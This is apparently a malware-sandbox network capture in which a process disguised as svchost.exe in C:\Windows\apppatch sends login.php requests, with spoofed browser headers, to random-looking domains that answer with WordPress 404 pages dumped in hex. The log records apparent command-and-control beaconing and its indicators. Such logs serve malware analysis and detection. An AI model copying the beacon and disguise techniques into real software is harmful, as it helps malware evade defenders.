                                                                                                                                                                                                          2024-11-11 17:24:07 UTC1369INData Raw: 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74
                                                                                                                                                                                                          Data Ascii: ontent .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .ent
                                                                                                                                                                                                          2024-11-11 17:24:07 UTC1369INData Raw: 73 69 62 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74
                                                                                                                                                                                                          Data Ascii: sible,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[t


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          2192.168.2.849721188.114.96.34431736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:24:08 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:24:10 UTC942INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:09 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FMycW30pxHHKMJHbMi3bkKygzaaSW2Dd8CvJHnYZnxVEND1IoKWJLh5mvDmAkyHUXZVTotwdFu036qMz3BEHiBKeqXvOpVjNBXudTSOHbQ6Mxhc4echZWYmip6uPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff963287c6a55-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1392&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2064148&cwnd=228&unsent_bytes=0&cid=3ebd3af10c63491a&ts=1252&x=0"
                                                                                                                                                                                                          2024-11-11 17:24:10 UTC427INData Raw: 37 63 62 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                          Data Ascii: 7cb0<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                          2024-11-11 17:24:10 UTC1369INData Raw: 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f
                                                                                                                                                                                                          Data Ascii: meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta property="o
                                                                                                                                                                                                          2024-11-11 17:24:10 UTC1369INData Raw: 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65
                                                                                                                                                                                                          Data Ascii: {try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e
                                                                                                                                                                                                          2024-11-11 17:24:10 UTC1369INData Raw: 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73
                                                                                                                                                                                                          Data Ascii: of Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(ses
                                                                                                                                                                                                          2024-11-11 17:24:10 UTC1369INData Raw: 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e
                                                                                                                                                                                                          Data Ascii: ji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min
                                                                                                                                                                                                          2024-11-11 17:24:10 UTC1369INData Raw: 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36
                                                                                                                                                                                                          Data Ascii: ption{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:6


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          3192.168.2.849727188.114.97.34431736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:24:11 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:24:13 UTC1094INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:13 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="56.7",amp_style_sanitizer;dur="28.1",amp_tag_and_attribute_sanitizer;dur="21.7",amp_optimizer;dur="32.0"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUoQnXRVY3CgeyMCB8nOONIE6bogyARv%2FN0RB8yvbY7gL3Ja3wFWErCPHzd4hx%2FOQYJ%2BCNy%2BBN0I%2FQh3tEDNLUSF%2F7AwSUpMDh5fcMtJJ8agfTMjMeV6BNJ4lRsvWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff9742bc02363-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1510&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=1931954&cwnd=251&unsent_bytes=0&cid=15fdb27d35db04cb&ts=1990&x=0"
                                                                                                                                                                                                          2024-11-11 17:24:13 UTC275INData Raw: 37 63 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                          Data Ascii: 7c18<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                          2024-11-11 17:24:13 UTC1369INData Raw: 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67
                                                                                                                                                                                                          Data Ascii: charset="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{heig
                                                                                                                                                                                                          2024-11-11 17:24:13 UTC1369INData Raw: 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62
                                                                                                                                                                                                          Data Ascii: crolling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightb
                                                                                                                                                                                                          2024-11-11 17:24:13 UTC1369INData Raw: 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d
                                                                                                                                                                                                          Data Ascii: dth:100%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-
                                                                                                                                                                                                          2024-11-11 17:24:13 UTC1369INData Raw: 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b
                                                                                                                                                                                                          Data Ascii: -amphtml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block
                                                                                                                                                                                                          2024-11-11 17:24:13 UTC1369INData Raw: 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b
                                                                                                                                                                                                          Data Ascii: isplay:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;
                                                                                                                                                                                                          2024-11-11 17:24:13 UTC1369INData Raw: 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d
                                                                                                                                                                                                          Data Ascii: uilt:not(.i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-
                                                                                                                                                                                                          2024-11-11 17:24:13 UTC1369INData Raw: 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65
                                                                                                                                                                                                          Data Ascii: bottom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:re
